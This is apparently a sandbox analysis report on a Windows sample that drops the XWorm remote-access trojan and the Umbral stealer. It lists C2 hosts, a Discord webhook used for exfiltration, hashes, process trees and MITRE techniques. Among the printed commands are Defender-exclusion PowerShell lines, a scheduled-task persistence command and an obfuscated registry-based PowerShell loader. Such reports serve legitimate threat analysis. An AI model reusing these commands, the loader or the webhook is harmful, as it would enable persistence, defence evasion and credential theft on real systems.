umbral | f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Analysis

max time kernel
149s
max time network
18s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
08-07-2024 17:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rootkit.exe
Size

274KB
MD5

87119ce97d460721e8c6cb98f990c780
SHA1

eac69d7550546b7812eb5701e82e079ff780d93a
SHA256

f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
SHA512

fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb
SSDEEP

6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo

Score

10^/10

umbral xworm evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403

Mutex

25nhnSSJeo8OHnH7

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Extracted

Family

umbral

https://discord.com/api/webhooks/1259895160632905769/Nt8uggl0mEBvysXT-BFIchzGoOqiC8hi2bWhb_ujCX5_THJiU5kiutfTRZpNtRkHK8Jq

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000018c0c-13.dat	family_umbral
behavioral1/memory/1916-15-0x00000000003F0000-0x0000000000430000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000018679-6.dat	family_xworm
behavioral1/memory/696-11-0x0000000001260000-0x0000000001270000-memory.dmp	family_xworm

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2612 created 432	2612	powershell.EXE	5

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2356	powershell.exe
2280	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
696	www.DeadSecObbbfuscation.exe
1916	Modify.exe
2868	www.DeadSec0000000000-obfusecator.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe"	rootkit.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	WMIADAP.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2612 set thread context of 1860	2612	powershell.EXE	42

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0b1156f5fd1da01	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	lsass.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2796	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2356	powershell.exe
2612	powershell.EXE
2612	powershell.EXE
1860	dllhost.exe
1860	dllhost.exe
1860	dllhost.exe
1860	dllhost.exe
2280	powershell.exe
1860	dllhost.exe
1860	dllhost.exe
796	wmiprvse.exe
796	wmiprvse.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	696	www.DeadSecObbbfuscation.exe
Token: SeDebugPrivilege	2356	powershell.exe
Token: SeDebugPrivilege	1916	Modify.exe
Token: SeDebugPrivilege	2612	powershell.EXE
Token: SeDebugPrivilege	2612	powershell.EXE
Token: SeDebugPrivilege	1860	dllhost.exe
Token: SeAuditPrivilege	856	svchost.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeAuditPrivilege	856	svchost.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 1820 wrote to memory of 696	1820	rootkit.exe	30
PID 1820 wrote to memory of 696	1820	rootkit.exe	30
PID 1820 wrote to memory of 696	1820	rootkit.exe	30
PID 1820 wrote to memory of 1916	1820	rootkit.exe	31
PID 1820 wrote to memory of 1916	1820	rootkit.exe	31
PID 1820 wrote to memory of 1916	1820	rootkit.exe	31
PID 1820 wrote to memory of 2356	1820	rootkit.exe	32
PID 1820 wrote to memory of 2356	1820	rootkit.exe	32
PID 1820 wrote to memory of 2356	1820	rootkit.exe	32
PID 1820 wrote to memory of 2796	1820	rootkit.exe	35
PID 1820 wrote to memory of 2796	1820	rootkit.exe	35
PID 1820 wrote to memory of 2796	1820	rootkit.exe	35
PID 1820 wrote to memory of 2868	1820	rootkit.exe	37
PID 1820 wrote to memory of 2868	1820	rootkit.exe	37
PID 1820 wrote to memory of 2868	1820	rootkit.exe	37
PID 1820 wrote to memory of 2868	1820	rootkit.exe	37
PID 2164 wrote to memory of 2612	2164	taskeng.exe	39
PID 2164 wrote to memory of 2612	2164	taskeng.exe	39
PID 2164 wrote to memory of 2612	2164	taskeng.exe	39
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 2612 wrote to memory of 1860	2612	powershell.EXE	42
PID 1860 wrote to memory of 432	1860	dllhost.exe	5
PID 1860 wrote to memory of 476	1860	dllhost.exe	6
PID 1860 wrote to memory of 492	1860	dllhost.exe	7
PID 1860 wrote to memory of 500	1860	dllhost.exe	8
PID 1860 wrote to memory of 592	1860	dllhost.exe	9
PID 1860 wrote to memory of 668	1860	dllhost.exe	10
PID 1860 wrote to memory of 744	1860	dllhost.exe	11
PID 1860 wrote to memory of 812	1860	dllhost.exe	12
PID 1860 wrote to memory of 856	1860	dllhost.exe	13
PID 1916 wrote to memory of 2280	1916	Modify.exe	43
PID 1916 wrote to memory of 2280	1916	Modify.exe	43
PID 1916 wrote to memory of 2280	1916	Modify.exe	43
PID 1860 wrote to memory of 968	1860	dllhost.exe	15
PID 1860 wrote to memory of 276	1860	dllhost.exe	16
PID 1860 wrote to memory of 300	1860	dllhost.exe	17
PID 1860 wrote to memory of 1068	1860	dllhost.exe	18
PID 1860 wrote to memory of 1108	1860	dllhost.exe	19
PID 1860 wrote to memory of 1172	1860	dllhost.exe	20
PID 1860 wrote to memory of 1204	1860	dllhost.exe	21
PID 1860 wrote to memory of 1276	1860	dllhost.exe	23
PID 1860 wrote to memory of 1632	1860	dllhost.exe	24
PID 1860 wrote to memory of 796	1860	dllhost.exe	25
PID 1860 wrote to memory of 2976	1860	dllhost.exe	26
PID 1860 wrote to memory of 332	1860	dllhost.exe	27
PID 1860 wrote to memory of 696	1860	dllhost.exe	30
PID 1860 wrote to memory of 1916	1860	dllhost.exe	31
PID 1860 wrote to memory of 1816	1860	dllhost.exe	34
PID 1860 wrote to memory of 2164	1860	dllhost.exe	38
PID 1860 wrote to memory of 2268	1860	dllhost.exe	41
PID 1860 wrote to memory of 2280	1860	dllhost.exe	43

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{56e3b453-7395-4cdc-8189-aff4e36ee1cd}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1860

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1276
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:796
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:2268
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:668
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:744
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1172
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:856
- - C:\Windows\system32\wbem\WMIADAP.EXE
    wmiadap.exe /F /T /R
    3⤵
    - Drops file in System32 directory
    PID:1816
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {99BDEF43-BC64-47A1-8CE4-D529125AA6B3} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+'s'+[Char](116)+''+[Char](97)+'g'+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2612
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:968
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:276
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:300
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1068
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1108
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1632
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2976
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:332

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1204
- C:\Users\Admin\AppData\Local\Temp\rootkit.exe
  "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1820
- - C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
    "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:696
- - C:\Users\Admin\AppData\Local\Temp\Modify.exe
    "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2356
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2796
- - C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
    "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
    3⤵
    - Executes dropped EXE
    PID:2868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

Filesize
164KB

MD5
22d120454dd38d7f1a3f1cd0eb497f95

SHA1
4c11a082bf8e64b21310b959821a9f7324aa8107

SHA256
6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

SHA512
1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Modify.exe

Filesize
229KB

MD5
9259d8aef8f52e8ff4fa082c0074c9b0

SHA1
88abb68a5632812be3c18e0c740e3818d9501b3e

SHA256
45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db

SHA512
9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

Download Submit
C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

Filesize
42KB

MD5
737b2d60dc5d475685b65f5c288e00c0

SHA1
144ba7647d8609abe4aab74d4f191e2c594dd55a

SHA256
69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084

SHA512
96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
b72a95ef479ac2bfdf8a3e730b3b6d63

SHA1
5399429e532e8227ffa90f453263da25aa42876a

SHA256
be097e9de01d7db57f8d1f569ce069300c8b7536bcdaf21a14e54edbfbd32526

SHA512
67d39d69f12ab42169d3d0986b73377894c304318c9ed1833406fc86041cdf779131cf3ffc2c2acb72440de586e609541809e47bf8d55d9f41e264b68fdcca12

Download Submit
memory/432-59-0x00000000375D0000-0x00000000375E0000-memory.dmp

Filesize
64KB

Download
memory/432-50-0x0000000000D20000-0x0000000000D4C000-memory.dmp

Filesize
176KB

Download
memory/432-49-0x0000000000CF0000-0x0000000000D16000-memory.dmp

Filesize
152KB

Download
memory/432-47-0x0000000000CF0000-0x0000000000D16000-memory.dmp

Filesize
152KB

Download
memory/432-51-0x0000000000D20000-0x0000000000D4C000-memory.dmp

Filesize
176KB

Download
memory/432-58-0x000007FEBDE70000-0x000007FEBDE80000-memory.dmp

Filesize
64KB

Download
memory/432-57-0x0000000000D20000-0x0000000000D4C000-memory.dmp

Filesize
176KB

Download
memory/476-71-0x0000000000160000-0x000000000018C000-memory.dmp

Filesize
176KB

Download
memory/476-72-0x000007FEBDE70000-0x000007FEBDE80000-memory.dmp

Filesize
64KB

Download
memory/476-73-0x00000000375D0000-0x00000000375E0000-memory.dmp

Filesize
64KB

Download
memory/476-65-0x0000000000160000-0x000000000018C000-memory.dmp

Filesize
176KB

Download
memory/492-85-0x00000000001A0000-0x00000000001CC000-memory.dmp

Filesize
176KB

Download
memory/492-86-0x000007FEBDE70000-0x000007FEBDE80000-memory.dmp

Filesize
64KB

Download
memory/492-87-0x00000000375D0000-0x00000000375E0000-memory.dmp

Filesize
64KB

Download
memory/492-79-0x00000000001A0000-0x00000000001CC000-memory.dmp

Filesize
176KB

Download
memory/592-97-0x00000000001E0000-0x000000000020C000-memory.dmp

Filesize
176KB

Download
memory/696-11-0x0000000001260000-0x0000000001270000-memory.dmp

Filesize
64KB

Download
memory/696-225-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download
memory/696-21-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download
memory/1820-30-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download
memory/1820-0-0x000007FEF58E3000-0x000007FEF58E4000-memory.dmp

Filesize
4KB

Download
memory/1820-20-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download
memory/1820-1-0x0000000000030000-0x000000000007A000-memory.dmp

Filesize
296KB

Download
memory/1860-41-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1860-43-0x0000000077370000-0x000000007748F000-memory.dmp

Filesize
1.1MB

Download
memory/1860-38-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1860-42-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/1860-39-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1860-37-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1860-36-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1860-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1916-15-0x00000000003F0000-0x0000000000430000-memory.dmp

Filesize
256KB

Download
memory/2280-156-0x00000000022C0000-0x00000000022C8000-memory.dmp

Filesize
32KB

Download
memory/2356-22-0x000000001B470000-0x000000001B752000-memory.dmp

Filesize
2.9MB

Download
memory/2356-23-0x0000000002820000-0x0000000002828000-memory.dmp

Filesize
32KB

Download
memory/2612-31-0x0000000019FB0000-0x000000001A292000-memory.dmp

Filesize
2.9MB

Download
memory/2612-32-0x0000000000980000-0x0000000000988000-memory.dmp

Filesize
32KB

Download
memory/2612-33-0x0000000001400000-0x000000000142A000-memory.dmp

Filesize
168KB

Download
memory/2612-34-0x0000000077590000-0x0000000077739000-memory.dmp

Filesize
1.7MB

Download
memory/2612-35-0x0000000077370000-0x000000007748F000-memory.dmp

Filesize
1.1MB

Download